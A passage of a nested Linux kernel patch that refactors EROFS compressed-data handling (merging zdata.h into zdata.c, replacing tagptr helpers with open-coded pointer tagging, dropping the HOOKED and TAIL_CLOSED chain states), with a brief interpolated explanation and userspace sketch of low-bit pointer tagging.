++ * A: Field should be accessed / updated in atomic for parallelized code.
++ */
++struct z_erofs_pcluster {
++	struct erofs_workgroup obj;
++	struct mutex lock;
++
++	/* A: point to next chained pcluster or TAILs */
++	z_erofs_next_pcluster_t next;
++
++	/* L: the maximum decompression size of this round */
++	unsigned int length;
++
++	/* L: total number of bvecs */
++	unsigned int vcnt;
++
++	/* I: page offset of start position of decompression */
++	unsigned short pageofs_out;
++
++	/* I: page offset of inline compressed data */
++	unsigned short pageofs_in;
++
++	union {
++		/* L: inline a certain number of bvec for bootstrap */
++		struct z_erofs_bvset_inline bvset;
++
++		/* I: can be used to free the pcluster by RCU. */
++		struct rcu_head rcu;
++	};
++
++	union {
++		/* I: physical cluster size in pages */
++		unsigned short pclusterpages;
++
++		/* I: tailpacking inline compressed size */
++		unsigned short tailpacking_size;
++	};
++
++	/* I: compression algorithm format */
++	unsigned char algorithmformat;
++
++	/* L: whether partial decompression or not */
++	bool partial;
++
++	/* L: indicate several pageofs_outs or not */
++	bool multibases;
++
++	/* A: compressed bvecs (can be cached or inplaced pages) */
++	struct z_erofs_bvec compressed_bvecs[];
++};
++
++/* let's avoid the valid 32-bit kernel addresses */
++
++/* the end of a chain of pclusters */
++#define Z_EROFS_PCLUSTER_TAIL           ((void *)0x5F0ECAFE)
++#define Z_EROFS_PCLUSTER_NIL            (NULL)
++
++struct z_erofs_decompressqueue {
++	struct super_block *sb;
++	atomic_t pending_bios;
++	z_erofs_next_pcluster_t head;
++
++	union {
++		struct completion done;
++		struct work_struct work;
++	} u;
++	bool eio, sync;
++};
++
++static inline bool z_erofs_is_inline_pcluster(struct z_erofs_pcluster *pcl)
++{
++	return !pcl->obj.index;
++}
++
++static inline unsigned int z_erofs_pclusterpages(struct z_erofs_pcluster *pcl)
++{
++	if (z_erofs_is_inline_pcluster(pcl))
++		return 1;
++	return pcl->pclusterpages;
++}
++
++/*
++ * bit 30: I/O error occurred on this page
++ * bit 0 - 29: remaining parts to complete this page
++ */
++#define Z_EROFS_PAGE_EIO			(1 << 30)
++
++static inline void z_erofs_onlinepage_init(struct page *page)
++{
++	union {
++		atomic_t o;
++		unsigned long v;
++	} u = { .o = ATOMIC_INIT(1) };
++
++	set_page_private(page, u.v);
++	smp_wmb();
++	SetPagePrivate(page);
++}
++
++static inline void z_erofs_onlinepage_split(struct page *page)
++{
++	atomic_inc((atomic_t *)&page->private);
++}
++
++static inline void z_erofs_page_mark_eio(struct page *page)
++{
++	int orig;
++
++	do {
++		orig = atomic_read((atomic_t *)&page->private);
++	} while (atomic_cmpxchg((atomic_t *)&page->private, orig,
++				orig | Z_EROFS_PAGE_EIO) != orig);
++}
++
++static inline void z_erofs_onlinepage_endio(struct page *page)
++{
++	unsigned int v;
++
++	DBG_BUGON(!PagePrivate(page));
++	v = atomic_dec_return((atomic_t *)&page->private);
++	if (!(v & ~Z_EROFS_PAGE_EIO)) {
++		set_page_private(page, 0);
++		ClearPagePrivate(page);
++		if (!(v & Z_EROFS_PAGE_EIO))
++			SetPageUptodate(page);
++		unlock_page(page);
++	}
++}
++
++#define Z_EROFS_ONSTACK_PAGES		32
++
+ /*
+  * since pclustersize is variable for big pcluster feature, introduce slab
+  * pools implementation for different pcluster sizes.
+@@ -175,25 +336,6 @@ static void z_erofs_free_pcluster(struct z_erofs_pcluster *pcl)
+ 	DBG_BUGON(1);
+ }
+ 
+-/* how to allocate cached pages for a pcluster */
+-enum z_erofs_cache_alloctype {
+-	DONTALLOC,	/* don't allocate any cached pages */
+-	/*
+-	 * try to use cached I/O if page allocation succeeds or fallback
+-	 * to in-place I/O instead to avoid any direct reclaim.
+-	 */
+-	TRYALLOC,
+-};
+-
+-/*
+- * tagged pointer with 1-bit tag for all compressed pages
+- * tag 0 - the page is just found with an extra page reference
+- */
+-typedef tagptr1_t compressed_page_t;
+-
+-#define tag_compressed_page_justfound(page) \
+-	tagptr_fold(compressed_page_t, page, 1)
+-
+ static struct workqueue_struct *z_erofs_workqueue __read_mostly;
+ 
+ void z_erofs_exit_zip_subsystem(void)
+@@ -230,20 +372,6 @@ int __init z_erofs_init_zip_subsystem(void)
+ 
+ enum z_erofs_pclustermode {
+ 	Z_EROFS_PCLUSTER_INFLIGHT,
+-	/*
+-	 * The current pclusters was the tail of an exist chain, in addition
+-	 * that the previous processed chained pclusters are all decided to
+-	 * be hooked up to it.
+-	 * A new chain will be created for the remaining pclusters which are
+-	 * not processed yet, so different from Z_EROFS_PCLUSTER_FOLLOWED,
+-	 * the next pcluster cannot reuse the whole page safely for inplace I/O
+-	 * in the following scenario:
+-	 *  ________________________________________________________________
+-	 * |      tail (partial) page     |       head (partial) page       |
+-	 * |   (belongs to the next pcl)  |   (belongs to the current pcl)  |
+-	 * |_______PCLUSTER_FOLLOWED______|________PCLUSTER_HOOKED__________|
+-	 */
+-	Z_EROFS_PCLUSTER_HOOKED,
+ 	/*
+ 	 * a weak form of Z_EROFS_PCLUSTER_FOLLOWED, the difference is that it
+ 	 * could be dispatched into bypass queue later due to uptodated managed
+@@ -261,8 +389,8 @@ enum z_erofs_pclustermode {
+ 	 *  ________________________________________________________________
+ 	 * |  tail (partial) page |          head (partial) page           |
+ 	 * |  (of the current cl) |      (of the previous collection)      |
+-	 * | PCLUSTER_FOLLOWED or |                                        |
+-	 * |_____PCLUSTER_HOOKED__|___________PCLUSTER_FOLLOWED____________|
++	 * |                      |                                        |
++	 * |__PCLUSTER_FOLLOWED___|___________PCLUSTER_FOLLOWED____________|
+ 	 *
+ 	 * [  (*) the above page can be used as inplace I/O.               ]
+ 	 */
+@@ -275,7 +403,7 @@ struct z_erofs_decompress_frontend {
+ 	struct z_erofs_bvec_iter biter;
+ 
+ 	struct page *candidate_bvpage;
+-	struct z_erofs_pcluster *pcl, *tailpcl;
++	struct z_erofs_pcluster *pcl;
+ 	z_erofs_next_pcluster_t owned_head;
+ 	enum z_erofs_pclustermode mode;
+ 
+@@ -292,12 +420,29 @@ struct z_erofs_decompress_frontend {
+ 	.inode = __i, .owned_head = Z_EROFS_PCLUSTER_TAIL, \
+ 	.mode = Z_EROFS_PCLUSTER_FOLLOWED, .backmost = true }
+ 
++static bool z_erofs_should_alloc_cache(struct z_erofs_decompress_frontend *fe)
++{
++	unsigned int cachestrategy = EROFS_I_SB(fe->inode)->opt.cache_strategy;
++
++	if (cachestrategy <= EROFS_ZIP_CACHE_DISABLED)
++		return false;
++
++	if (fe->backmost)
++		return true;
++
++	if (cachestrategy >= EROFS_ZIP_CACHE_READAROUND &&
++	    fe->map.m_la < fe->headoffset)
++		return true;
++
++	return false;
++}
++
+ static void z_erofs_bind_cache(struct z_erofs_decompress_frontend *fe,
+-			       enum z_erofs_cache_alloctype type,
+ 			       struct page **pagepool)
+ {
+ 	struct address_space *mc = MNGD_MAPPING(EROFS_I_SB(fe->inode));
+ 	struct z_erofs_pcluster *pcl = fe->pcl;
++	bool shouldalloc = z_erofs_should_alloc_cache(fe);
+ 	bool standalone = true;
+ 	/*
+ 	 * optimistic allocation without direct reclaim since inplace I/O
+@@ -312,7 +457,7 @@ static void z_erofs_bind_cache(struct z_erofs_decompress_frontend *fe,
+ 
+ 	for (i = 0; i < pcl->pclusterpages; ++i) {
+ 		struct page *page;
+-		compressed_page_t t;
++		void *t;	/* mark pages just found for debugging */
+ 		struct page *newpage = NULL;
+ 
+ 		/* the compressed page was loaded before */
+@@ -322,26 +467,26 @@ static void z_erofs_bind_cache(struct z_erofs_decompress_frontend *fe,
+ 		page = find_get_page(mc, pcl->obj.index + i);
+ 
+ 		if (page) {
+-			t = tag_compressed_page_justfound(page);
++			t = (void *)((unsigned long)page | 1);
+ 		} else {
+ 			/* I/O is needed, no possible to decompress directly */
+ 			standalone = false;
+-			switch (type) {
+-			case TRYALLOC:
+-				newpage = erofs_allocpage(pagepool, gfp);
+-				if (!newpage)
+-					continue;
+-				set_page_private(newpage,
+-						 Z_EROFS_PREALLOCATED_PAGE);
+-				t = tag_compressed_page_justfound(newpage);
+-				break;
+-			default:        /* DONTALLOC */
++			if (!shouldalloc)
+ 				continue;
+-			}
++
++			/*
++			 * try to use cached I/O if page allocation
++			 * succeeds, or fall back to in-place I/O instead
++			 * to avoid any direct reclaim.
++			 */
++			newpage = erofs_allocpage(pagepool, gfp);
++			if (!newpage)
++				continue;
++			set_page_private(newpage, Z_EROFS_PREALLOCATED_PAGE);
++			t = (void *)((unsigned long)newpage | 1);
+ 		}
+ 
+-		if (!cmpxchg_relaxed(&pcl->compressed_bvecs[i].page, NULL,
+-				     tagptr_cast_ptr(t)))
++		if (!cmpxchg_relaxed(&pcl->compressed_bvecs[i].page, NULL, t))
+ 			continue;
+ 
+ 		if (page)
+@@ -464,19 +609,7 @@ static void z_erofs_try_to_claim_pcluster(struct z_erofs_decompress_frontend *f)
+ 		return;
+ 	}
+ 
+-	/*
+-	 * type 2, link to the end of an existing open chain, be careful
+-	 * that its submission is controlled by the original attached chain.
+-	 */
+-	if (*owned_head != &pcl->next && pcl != f->tailpcl &&
+-	    cmpxchg(&pcl->next, Z_EROFS_PCLUSTER_TAIL,
+-		    *owned_head) == Z_EROFS_PCLUSTER_TAIL) {
+-		*owned_head = Z_EROFS_PCLUSTER_TAIL;
+-		f->mode = Z_EROFS_PCLUSTER_HOOKED;
+-		f->tailpcl = NULL;
+-		return;
+-	}
+-	/* type 3, it belongs to a chain, but it isn't the end of the chain */
++	/* type 2, it belongs to an ongoing chain */
+ 	f->mode = Z_EROFS_PCLUSTER_INFLIGHT;
+ }
+ 
+@@ -537,9 +670,6 @@ static int z_erofs_register_pcluster(struct z_erofs_decompress_frontend *fe)
+ 			goto err_out;
+ 		}
+ 	}
+-	/* used to check tail merging loop due to corrupted images */
+-	if (fe->owned_head == Z_EROFS_PCLUSTER_TAIL)
+-		fe->tailpcl = pcl;
+ 	fe->owned_head = &pcl->next;
+ 	fe->pcl = pcl;
+ 	return 0;
+@@ -560,7 +690,6 @@ static int z_erofs_collector_begin(struct z_erofs_decompress_frontend *fe)
+ 
+ 	/* must be Z_EROFS_PCLUSTER_TAIL or pointed to previous pcluster */
+ 	DBG_BUGON(fe->owned_head == Z_EROFS_PCLUSTER_NIL);
+-	DBG_BUGON(fe->owned_head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
+ 
+ 	if (!(map->m_flags & EROFS_MAP_META)) {
+ 		grp = erofs_find_workgroup(fe->inode->i_sb,
+@@ -579,10 +708,6 @@ static int z_erofs_collector_begin(struct z_erofs_decompress_frontend *fe)
+ 
+ 	if (ret == -EEXIST) {
+ 		mutex_lock(&fe->pcl->lock);
+-		/* used to check tail merging loop due to corrupted images */
+-		if (fe->owned_head == Z_EROFS_PCLUSTER_TAIL)
+-			fe->tailpcl = fe->pcl;
+-
+ 		z_erofs_try_to_claim_pcluster(fe);
+ 	} else if (ret) {
+ 		return ret;
+@@ -638,20 +763,6 @@ static bool z_erofs_collector_end(struct z_erofs_decompress_frontend *fe)
+ 	return true;
+ }
+ 
+-static bool should_alloc_managed_pages(struct z_erofs_decompress_frontend *fe,
+-				       unsigned int cachestrategy,
+-				       erofs_off_t la)
+-{
+-	if (cachestrategy <= EROFS_ZIP_CACHE_DISABLED)
+-		return false;
+-
+-	if (fe->backmost)
+-		return true;
+-
+-	return cachestrategy >= EROFS_ZIP_CACHE_READAROUND &&
+-		la < fe->headoffset;
+-}
+-
+ static int z_erofs_read_fragment(struct inode *inode, erofs_off_t pos,
+ 				 struct page *page, unsigned int pageofs,
+ 				 unsigned int len)
+@@ -688,12 +799,9 @@ static int z_erofs_do_read_page(struct z_erofs_decompress_frontend *fe,
+ 				struct page *page, struct page **pagepool)
+ {
+ 	struct inode *const inode = fe->inode;
+-	struct erofs_sb_info *const sbi = EROFS_I_SB(inode);
+ 	struct erofs_map_blocks *const map = &fe->map;
+ 	const loff_t offset = page_offset(page);
+ 	bool tight = true, exclusive;
+-
+-	enum z_erofs_cache_alloctype cache_strategy;
+ 	unsigned int cur, end, spiltted;
+ 	int err = 0;
+ 
+@@ -747,13 +855,7 @@ repeat:
+ 		fe->mode = Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE;
+ 	} else {
+ 		/* bind cache first when cached decompression is preferred */
+-		if (should_alloc_managed_pages(fe, sbi->opt.cache_strategy,
+-					       map->m_la))
+-			cache_strategy = TRYALLOC;
+-		else
+-			cache_strategy = DONTALLOC;
+-
+-		z_erofs_bind_cache(fe, cache_strategy, pagepool);
++		z_erofs_bind_cache(fe, pagepool);
+ 	}
+ hitted:
+ 	/*
+@@ -762,8 +864,7 @@ hitted:
+ 	 * those chains are handled asynchronously thus the page cannot be used
+ 	 * for inplace I/O or bvpage (should be processed in a strict order.)
+ 	 */
+-	tight &= (fe->mode >= Z_EROFS_PCLUSTER_HOOKED &&
+-		  fe->mode != Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE);
++	tight &= (fe->mode > Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE);
+ 
+ 	cur = end - min_t(unsigned int, offset + end - map->m_la, end);
+ 	if (!(map->m_flags & EROFS_MAP_MAPPED)) {
+@@ -1144,10 +1245,7 @@ static void z_erofs_decompress_queue(const struct z_erofs_decompressqueue *io,
+ 	};
+ 	z_erofs_next_pcluster_t owned = io->head;
+ 
+-	while (owned != Z_EROFS_PCLUSTER_TAIL_CLOSED) {
+-		/* impossible that 'owned' equals Z_EROFS_WORK_TPTR_TAIL */
+-		DBG_BUGON(owned == Z_EROFS_PCLUSTER_TAIL);
+-		/* impossible that 'owned' equals Z_EROFS_PCLUSTER_NIL */
++	while (owned != Z_EROFS_PCLUSTER_TAIL) {
+ 		DBG_BUGON(owned == Z_EROFS_PCLUSTER_NIL);
+ 
+ 		be.pcl = container_of(owned, struct z_erofs_pcluster, next);
+@@ -1164,7 +1262,7 @@ static void z_erofs_decompressqueue_work(struct work_struct *work)
+ 		container_of(work, struct z_erofs_decompressqueue, u.work);
+ 	struct page *pagepool = NULL;
+ 
+-	DBG_BUGON(bgq->head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
++	DBG_BUGON(bgq->head == Z_EROFS_PCLUSTER_TAIL);
+ 	z_erofs_decompress_queue(bgq, &pagepool);
+ 
+ 	erofs_release_pages(&pagepool);
+@@ -1172,12 +1270,12 @@ static void z_erofs_decompressqueue_work(struct work_struct *work)
+ }
+ 
+ static void z_erofs_decompress_kickoff(struct z_erofs_decompressqueue *io,
+-				       bool sync, int bios)
++				       int bios)
+ {
+ 	struct erofs_sb_info *const sbi = EROFS_SB(io->sb);
+ 
+ 	/* wake up the caller thread for sync decompression */
+-	if (sync) {
++	if (io->sync) {
+ 		if (!atomic_add_return(bios, &io->pending_bios))
+ 			complete(&io->u.done);
+ 		return;
+@@ -1207,8 +1305,6 @@ static struct page *pickup_page_for_submission(struct z_erofs_pcluster *pcl,
+ 
+ 	struct address_space *mapping;
+ 	struct page *oldpage, *page;
+-
+-	compressed_page_t t;
+ 	int justfound;
+ 
+ repeat:
+@@ -1218,10 +1314,8 @@ repeat:
+ 	if (!page)
+ 		goto out_allocpage;
+ 
+-	/* process the target tagged pointer */
+-	t = tagptr_init(compressed_page_t, page);
+-	justfound = tagptr_unfold_tags(t);
+-	page = tagptr_unfold_ptr(t);
++	justfound = (unsigned long)page & 1UL;
++	page = (struct page *)((unsigned long)page & ~1UL);
+ 
+ 	/*
+ 	 * preallocated cached pages, which is used to avoid direct reclaim
+@@ -1309,9 +1403,8 @@ out:	/* the only exit (for tracing and debugging) */
+ 	return page;
+ }
+ 
+-static struct z_erofs_decompressqueue *
+-jobqueue_init(struct super_block *sb,
+-	      struct z_erofs_decompressqueue *fgq, bool *fg)
++static struct z_erofs_decompressqueue *jobqueue_init(struct super_block *sb,
++			      struct z_erofs_decompressqueue *fgq, bool *fg)
+ {
+ 	struct z_erofs_decompressqueue *q;
+ 
+@@ -1328,9 +1421,10 @@ fg_out:
+ 		init_completion(&fgq->u.done);
+ 		atomic_set(&fgq->pending_bios, 0);
+ 		q->eio = false;
++		q->sync = true;
+ 	}
+ 	q->sb = sb;
+-	q->head = Z_EROFS_PCLUSTER_TAIL_CLOSED;
++	q->head = Z_EROFS_PCLUSTER_TAIL;
+ 	return q;
+ }
+ 
+@@ -1341,20 +1435,6 @@ enum {
+ 	NR_JOBQUEUES,
+ };
+ 
+-static void *jobqueueset_init(struct super_block *sb,
+-			      struct z_erofs_decompressqueue *q[],
+-			      struct z_erofs_decompressqueue *fgq, bool *fg)
+-{
+-	/*
+-	 * if managed cache is enabled, bypass jobqueue is needed,
+-	 * no need to read from device for all pclusters in this queue.
+-	 */
+-	q[JQ_BYPASS] = jobqueue_init(sb, fgq + JQ_BYPASS, NULL);
+-	q[JQ_SUBMIT] = jobqueue_init(sb, fgq + JQ_SUBMIT, fg);
+-
+-	return tagptr_cast_ptr(tagptr_fold(tagptr1_t, q[JQ_SUBMIT], *fg));
+-}
+-
+ static void move_to_bypass_jobqueue(struct z_erofs_pcluster *pcl,
+ 				    z_erofs_next_pcluster_t qtail[],
+ 				    z_erofs_next_pcluster_t owned_head)
+@@ -1362,11 +1442,7 @@ static void move_to_bypass_jobqueue(struct z_erofs_pcluster *pcl,
+ 	z_erofs_next_pcluster_t *const submit_qtail = qtail[JQ_SUBMIT];
+ 	z_erofs_next_pcluster_t *const bypass_qtail = qtail[JQ_BYPASS];
+ 
+-	DBG_BUGON(owned_head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
+-	if (owned_head == Z_EROFS_PCLUSTER_TAIL)
+-		owned_head = Z_EROFS_PCLUSTER_TAIL_CLOSED;
+-
+-	WRITE_ONCE(pcl->next, Z_EROFS_PCLUSTER_TAIL_CLOSED);
++	WRITE_ONCE(pcl->next, Z_EROFS_PCLUSTER_TAIL);
+ 
+ 	WRITE_ONCE(*submit_qtail, owned_head);
+ 	WRITE_ONCE(*bypass_qtail, &pcl->next);
+@@ -1376,8 +1452,7 @@ static void move_to_bypass_jobqueue(struct z_erofs_pcluster *pcl,
+ 
+ static void z_erofs_decompressqueue_endio(struct bio *bio)
+ {
+-	tagptr1_t t = tagptr_init(tagptr1_t, bio->bi_private);
+-	struct z_erofs_decompressqueue *q = tagptr_unfold_ptr(t);
++	struct z_erofs_decompressqueue *q = bio->bi_private;
+ 	blk_status_t err = bio->bi_status;
+ 	struct bio_vec *bvec;
+ 	struct bvec_iter_all iter_all;
+@@ -1396,7 +1471,7 @@ static void z_erofs_decompressqueue_endio(struct bio *bio)
+ 	}
+ 	if (err)
+ 		q->eio = true;
+-	z_erofs_decompress_kickoff(q, tagptr_unfold_tags(t), -1);
++	z_erofs_decompress_kickoff(q, -1);
+ 	bio_put(bio);
+ }
+ 
+@@ -1409,7 +1484,6 @@ static void z_erofs_submit_queue(struct z_erofs_decompress_frontend *f,
+ 	struct address_space *mc = MNGD_MAPPING(EROFS_SB(sb));
+ 	z_erofs_next_pcluster_t qtail[NR_JOBQUEUES];
+ 	struct z_erofs_decompressqueue *q[NR_JOBQUEUES];
+-	void *bi_private;
+ 	z_erofs_next_pcluster_t owned_head = f->owned_head;
+ 	/* bio is NULL initially, so no need to initialize last_{index,bdev} */
+ 	pgoff_t last_index;
+@@ -1419,7 +1493,13 @@ static void z_erofs_submit_queue(struct z_erofs_decompress_frontend *f,
+ 	unsigned long pflags;
+ 	int memstall = 0;
+ 
+-	bi_private = jobqueueset_init(sb, q, fgq, force_fg);
++	/*
++	 * if managed cache is enabled, bypass jobqueue is needed,
++	 * no need to read from device for all pclusters in this queue.
++	 */
++	q[JQ_BYPASS] = jobqueue_init(sb, fgq + JQ_BYPASS, NULL);
++	q[JQ_SUBMIT] = jobqueue_init(sb, fgq + JQ_SUBMIT, force_fg);
++
+ 	qtail[JQ_BYPASS] = &q[JQ_BYPASS]->head;
+ 	qtail[JQ_SUBMIT] = &q[JQ_SUBMIT]->head;
+ 
+@@ -1433,15 +1513,10 @@ static void z_erofs_submit_queue(struct z_erofs_decompress_frontend *f,
+ 		unsigned int i = 0;
+ 		bool bypass = true;
+ 
+-		/* no possible 'owned_head' equals the following */
+-		DBG_BUGON(owned_head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
+ 		DBG_BUGON(owned_head == Z_EROFS_PCLUSTER_NIL);
+-
+ 		pcl = container_of(owned_head, struct z_erofs_pcluster, next);
++		owned_head = READ_ONCE(pcl->next);
+ 
+-		/* close the main owned chain at first */
+-		owned_head = cmpxchg(&pcl->next, Z_EROFS_PCLUSTER_TAIL,
+-				     Z_EROFS_PCLUSTER_TAIL_CLOSED);
+ 		if (z_erofs_is_inline_pcluster(pcl)) {
+ 			move_to_bypass_jobqueue(pcl, qtail, owned_head);
+ 			continue;
+@@ -1488,7 +1563,7 @@ submit_bio_retry:
+ 				last_bdev = mdev.m_bdev;
+ 				bio->bi_iter.bi_sector = (sector_t)cur <<
+ 					LOG_SECTORS_PER_BLOCK;
+-				bio->bi_private = bi_private;
++				bio->bi_private = q[JQ_SUBMIT];
+ 				if (f->readahead)
+ 					bio->bi_opf |= REQ_RAHEAD;
+ 				++nr_bios;
+@@ -1521,7 +1596,7 @@ submit_bio_retry:
+ 		kvfree(q[JQ_SUBMIT]);
+ 		return;
+ 	}
+-	z_erofs_decompress_kickoff(q[JQ_SUBMIT], *force_fg, nr_bios);
++	z_erofs_decompress_kickoff(q[JQ_SUBMIT], nr_bios);
+ }
+ 
+ static void z_erofs_runqueue(struct z_erofs_decompress_frontend *f,
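
With tagptr.h gone, zdata.c open-codes the same trick in the hunks above: page pointers are at least word-aligned, so bit 0 is free to record the "just found" state, as in the (void *)((unsigned long)page | 1) lines. A userspace sketch of low-bit pointer tagging:

#include <stdint.h>
#include <stdio.h>

/* Pointers to objects with alignment >= 2 never have bit 0 set,
 * so it can carry a one-bit flag alongside the pointer. */
static void *tag_justfound(void *p)	{ return (void *)((uintptr_t)p | 1); }
static int is_justfound(void *t)	{ return (uintptr_t)t & 1; }
static void *untag(void *t)		{ return (void *)((uintptr_t)t & ~(uintptr_t)1); }

int main(void)
{
	int value = 42;
	void *t = tag_justfound(&value);

	printf("justfound=%d value=%d\n", is_justfound(t), *(int *)untag(t));
	return 0;
}
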
+diff --git a/fs/erofs/zdata.h b/fs/erofs/zdata.h
+deleted file mode 100644
+index d98c952129852..0000000000000
+--- a/fs/erofs/zdata.h
++++ /dev/null
+@@ -1,178 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-only */
+-/*
+- * Copyright (C) 2018 HUAWEI, Inc.
+- *             https://www.huawei.com/
+- */
+-#ifndef __EROFS_FS_ZDATA_H
+-#define __EROFS_FS_ZDATA_H
+-
+-#include "internal.h"
+-#include "tagptr.h"
+-
+-#define Z_EROFS_PCLUSTER_MAX_PAGES	(Z_EROFS_PCLUSTER_MAX_SIZE / PAGE_SIZE)
+-#define Z_EROFS_INLINE_BVECS		2
+-
+-/*
+- * let's leave a type here in case of introducing
+- * another tagged pointer later.
+- */
+-typedef void *z_erofs_next_pcluster_t;
+-
+-struct z_erofs_bvec {
+-	struct page *page;
+-	int offset;
+-	unsigned int end;
+-};
+-
+-#define __Z_EROFS_BVSET(name, total) \
+-struct name { \
+-	/* point to the next page which contains the following bvecs */ \
+-	struct page *nextpage; \
+-	struct z_erofs_bvec bvec[total]; \
+-}
+-__Z_EROFS_BVSET(z_erofs_bvset,);
+-__Z_EROFS_BVSET(z_erofs_bvset_inline, Z_EROFS_INLINE_BVECS);
+-
+-/*
+- * Structure fields follow one of the following exclusion rules.
+- *
+- * I: Modifiable by initialization/destruction paths and read-only
+- *    for everyone else;
+- *
+- * L: Field should be protected by the pcluster lock;
+- *
+- * A: Field should be accessed / updated in atomic for parallelized code.
+- */
+-struct z_erofs_pcluster {
+-	struct erofs_workgroup obj;
+-	struct mutex lock;
+-
+-	/* A: point to next chained pcluster or TAILs */
+-	z_erofs_next_pcluster_t next;
+-
+-	/* L: the maximum decompression size of this round */
+-	unsigned int length;
+-
+-	/* L: total number of bvecs */
+-	unsigned int vcnt;
+-
+-	/* I: page offset of start position of decompression */
+-	unsigned short pageofs_out;
+-
+-	/* I: page offset of inline compressed data */
+-	unsigned short pageofs_in;
+-
+-	union {
+-		/* L: inline a certain number of bvec for bootstrap */
+-		struct z_erofs_bvset_inline bvset;
+-
+-		/* I: can be used to free the pcluster by RCU. */
+-		struct rcu_head rcu;
+-	};
+-
+-	union {
+-		/* I: physical cluster size in pages */
+-		unsigned short pclusterpages;
+-
+-		/* I: tailpacking inline compressed size */
+-		unsigned short tailpacking_size;
+-	};
+-
+-	/* I: compression algorithm format */
+-	unsigned char algorithmformat;
+-
+-	/* L: whether partial decompression or not */
+-	bool partial;
+-
+-	/* L: indicate several pageofs_outs or not */
+-	bool multibases;
+-
+-	/* A: compressed bvecs (can be cached or inplaced pages) */
+-	struct z_erofs_bvec compressed_bvecs[];
+-};
+-
+-/* let's avoid the valid 32-bit kernel addresses */
+-
+-/* the chained workgroup has't submitted io (still open) */
+-#define Z_EROFS_PCLUSTER_TAIL           ((void *)0x5F0ECAFE)
+-/* the chained workgroup has already submitted io */
+-#define Z_EROFS_PCLUSTER_TAIL_CLOSED    ((void *)0x5F0EDEAD)
+-
+-#define Z_EROFS_PCLUSTER_NIL            (NULL)
+-
+-struct z_erofs_decompressqueue {
+-	struct super_block *sb;
+-	atomic_t pending_bios;
+-	z_erofs_next_pcluster_t head;
+-
+-	union {
+-		struct completion done;
+-		struct work_struct work;
+-	} u;
+-
+-	bool eio;
+-};
+-
+-static inline bool z_erofs_is_inline_pcluster(struct z_erofs_pcluster *pcl)
+-{
+-	return !pcl->obj.index;
+-}
+-
+-static inline unsigned int z_erofs_pclusterpages(struct z_erofs_pcluster *pcl)
+-{
+-	if (z_erofs_is_inline_pcluster(pcl))
+-		return 1;
+-	return pcl->pclusterpages;
+-}
+-
+-/*
+- * bit 30: I/O error occurred on this page
+- * bit 0 - 29: remaining parts to complete this page
+- */
+-#define Z_EROFS_PAGE_EIO			(1 << 30)
+-
+-static inline void z_erofs_onlinepage_init(struct page *page)
+-{
+-	union {
+-		atomic_t o;
+-		unsigned long v;
+-	} u = { .o = ATOMIC_INIT(1) };
+-
+-	set_page_private(page, u.v);
+-	smp_wmb();
+-	SetPagePrivate(page);
+-}
+-
+-static inline void z_erofs_onlinepage_split(struct page *page)
+-{
+-	atomic_inc((atomic_t *)&page->private);
+-}
+-
+-static inline void z_erofs_page_mark_eio(struct page *page)
+-{
+-	int orig;
+-
+-	do {
+-		orig = atomic_read((atomic_t *)&page->private);
+-	} while (atomic_cmpxchg((atomic_t *)&page->private, orig,
+-				orig | Z_EROFS_PAGE_EIO) != orig);
+-}
+-
+-static inline void z_erofs_onlinepage_endio(struct page *page)
+-{
+-	unsigned int v;
+-
+-	DBG_BUGON(!PagePrivate(page));
+-	v = atomic_dec_return((atomic_t *)&page->private);
+-	if (!(v & ~Z_EROFS_PAGE_EIO)) {
+-		set_page_private(page, 0);
+-		ClearPagePrivate(page);
+-		if (!(v & Z_EROFS_PAGE_EIO))
+-			SetPageUptodate(page);
+-		unlock_page(page);
+-	}
+-}
+-
+-#define Z_EROFS_ONSTACK_PAGES		32
+-
+-#endif
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index bb91cc6499725..0337b70b2dac4 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -55,8 +55,7 @@ static int z_erofs_fill_inode_lazy(struct inode *inode)
+ 	if (test_bit(EROFS_I_Z_INITED_BIT, &vi->flags))
+ 		goto out_unlock;
+ 
+-	pos = ALIGN(iloc(EROFS_SB(sb), vi->nid) + vi->inode_isize +
+-		    vi->xattr_isize, 8);
++	pos = ALIGN(erofs_iloc(inode) + vi->inode_isize + vi->xattr_isize, 8);
+ 	kaddr = erofs_read_metabuf(&buf, sb, erofs_blknr(pos), EROFS_KMAP);
+ 	if (IS_ERR(kaddr)) {
+ 		err = PTR_ERR(kaddr);
+@@ -169,10 +168,9 @@ static int legacy_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ {
+ 	struct inode *const inode = m->inode;
+ 	struct erofs_inode *const vi = EROFS_I(inode);
+-	const erofs_off_t ibase = iloc(EROFS_I_SB(inode), vi->nid);
+ 	const erofs_off_t pos =
+-		Z_EROFS_VLE_LEGACY_INDEX_ALIGN(ibase + vi->inode_isize +
+-					       vi->xattr_isize) +
++		Z_EROFS_VLE_LEGACY_INDEX_ALIGN(erofs_iloc(inode) +
++				vi->inode_isize + vi->xattr_isize) +
+ 		lcn * sizeof(struct z_erofs_vle_decompressed_index);
+ 	struct z_erofs_vle_decompressed_index *di;
+ 	unsigned int advise, type;
+@@ -273,7 +271,7 @@ static int unpack_compacted_index(struct z_erofs_maprecorder *m,
+ 	u8 *in, type;
+ 	bool big_pcluster;
+ 
+-	if (1 << amortizedshift == 4)
++	if (1 << amortizedshift == 4 && lclusterbits <= 14)
+ 		vcnt = 2;
+ 	else if (1 << amortizedshift == 2 && lclusterbits == 12)
+ 		vcnt = 16;
+@@ -375,18 +373,13 @@ static int compacted_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ {
+ 	struct inode *const inode = m->inode;
+ 	struct erofs_inode *const vi = EROFS_I(inode);
+-	const unsigned int lclusterbits = vi->z_logical_clusterbits;
+-	const erofs_off_t ebase = ALIGN(iloc(EROFS_I_SB(inode), vi->nid) +
+-					vi->inode_isize + vi->xattr_isize, 8) +
+-		sizeof(struct z_erofs_map_header);
++	const erofs_off_t ebase = sizeof(struct z_erofs_map_header) +
++		ALIGN(erofs_iloc(inode) + vi->inode_isize + vi->xattr_isize, 8);
+ 	const unsigned int totalidx = DIV_ROUND_UP(inode->i_size, EROFS_BLKSIZ);
